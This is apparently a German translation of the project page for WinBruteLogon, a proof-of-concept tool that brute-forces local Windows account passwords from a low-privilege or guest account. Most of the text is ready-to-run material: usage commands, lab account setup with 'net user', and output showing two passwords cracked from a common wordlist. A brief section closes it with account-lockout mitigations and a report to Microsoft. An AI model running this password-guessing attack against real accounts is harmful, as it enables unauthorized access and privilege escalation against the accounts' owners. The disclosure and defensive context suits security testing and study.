
Knacken Sie jedes Microsoft Windows-Benutzerpasswort ohne jegliche Berechtigung (Gastkonto eingeschlossen)
Hinweis 1: Wir freuen uns, bekannt geben zu können, dass unser aktuelles Tool in eine PowerShell-Version portiert wurde. Dies bedeutet, dass Benutzer das Tool nun direkt über die PowerShell-Befehlszeile aufrufen und verwenden können, was die Nutzung noch bequemer und effizienter macht. Wir sind überzeugt, dass diese neue Version unseren Benutzern großen Nutzen bringen und ihre Erfahrung mit dem Tool verbessern wird. Vielen Dank für Ihre anhaltende Unterstützung. Wir hoffen, Ihnen gefällt die neue PowerShell-Version: https://github.com/DarkCoderSc/power-brute-logon
Hinweis 2: Wir haben kürzlich erfahren, dass Microsoft die Kontosperrrichtlinie in modernen und aktuellen Windows-Versionen standardmäßig aktiviert hat. Diese Richtlinie trägt zur Systemsicherheit bei, indem ein Konto nach einer bestimmten Anzahl fehlgeschlagener Anmeldeversuche gesperrt wird. Obwohl diese Sicherheitsmaßnahme sinnvoll ist, macht sie den Proof-of-Concept (PoC) auf diesen Systemen ineffizient.
Veröffentlichungsdatum: 2020-05-14
Ziel: Windows XP bis aktuelle Windows 10 Version (1909)

Schwachstellenort: LogonUserA, LogonUserW, CreateProcessWithLogonA, CreateProcessWithLogonW
WinBruteLogon.exe -u <benutzername> -w <wortlistendatei>
type <wortlistendatei> | WinBruteLogon.exe -u <benutzername> -
Win Brute Logon wurde entwickelt, um einen Brute-Force-Angriff auf ein Microsoft-Konto zu simulieren, indem in kurzer Zeit eine große Anzahl von Passwortkombinationen erraten wird. Auf diese Weise können Pentester die Sicherheitslage ihrer Systeme testen und deren Abwehr gegen Brute-Force-Angriffe bewerten. Das Tool nutzt das Fehlen eines Kontosperrmechanismus aus, eine häufige Schwachstelle in vielen Systemen (bevor die Kontosperrung standardmäßig unter Windows 11 aktiviert wurde). Durch das Erraten des Passworts eines Kontos kann das Tool Pentestern helfen, Schwachstellen in ihren Sicherheitsmaßnahmen zu identifizieren und zu beheben. Es sollte verantwortungsvoll und im Rahmen der gesetzlichen Bestimmungen eingesetzt werden.
Für diese Demonstration richten wir eine frische Version von Windows 10 auf einer virtuellen oder physischen Maschine ein. Nachdem die Maschine eingerichtet ist, melden Sie sich als Administrator an. Erstellen Sie dann zwei verschiedene lokale Konten: ein Administratorkonto und ein reguläres Benutzerkonto. Bitte beachten Sie, dass dieser Proof-of-Concept (PoC) zwar für die Demo mit dem Gastkonto durchgeführt wird, aber nicht auf das Gastkonto beschränkt ist. Er kann von jedem Konto oder jeder Gruppe aus verwendet werden, einschließlich Gast, regulärem Benutzer und Admin-Benutzer.
net user darkcodersc /add
net user darkcodersc trousers (trousers ist das Passwort)
net localgroup administrators darkcodersc /add
net user HackMe /add
net user HackMe ozlq6qwm (ozlq6qwm ist das Passwort)
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
In meinem Fall sind sowohl trousers als auch ozlq6qwm in SecList enthalten: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
Melden Sie sich für die Demonstration vom Administratorkonto ab oder starten Sie die Maschine neu und melden Sie sich am Gastkonto an. Platzieren Sie dann die PoC-Ausführungsdatei an einem Ort, auf den Sie als Gastbenutzer Zugriff haben.
Verwendung: WinBruteLogon.exe -v -u <benutzername> -w <wortlistendatei>
-v ist optional und steht für den ausführlichen Modus.
Standardmäßig ist der Domänenname der Wert der Umgebungsvariablen %USERDOMAIN%. Sie können mit der Option -d einen benutzerdefinierten Namen angeben.
darkcodersc (Administrator)prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Warten Sie einige Sekunden, um das folgende Ergebnis zu sehen:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
HackMe (Regulärer Benutzer)prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Warten Sie einige Sekunden, um das folgende Ergebnis zu sehen:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
„In einem praxisnahen Szenario könnte ein Angreifer, der Zugriff auf ein Benutzerkonto mit niedrigen Rechten erlangt hat, das Passwort eines privilegierteren Benutzers knacken und seine Berechtigungen ausweiten. Um dieses Risiko zu mindern, können folgende Schritte unternommen werden:
Um eine Sicherheitssperrrichtlinie zu implementieren (die standardmäßig nicht aktiviert ist), gehen Sie wie folgt vor:
Bitte beachten Sie, dass die Sperrrichtlinie nicht für das Administratorkonto gilt. In diesem Fall ist der beste Schutz für das Administratorkonto (falls aktiviert) die Einrichtung eines sehr komplexen Passworts.
Ein Bericht über diese Schwachstelle wurde an das Microsoft Security Team gesendet. Sie sollten erwägen, die Kontosperrrichtlinie standardmäßig zu aktivieren."
(UPDATE 2022): Kontosperrung endlich standardmäßig aktiviert.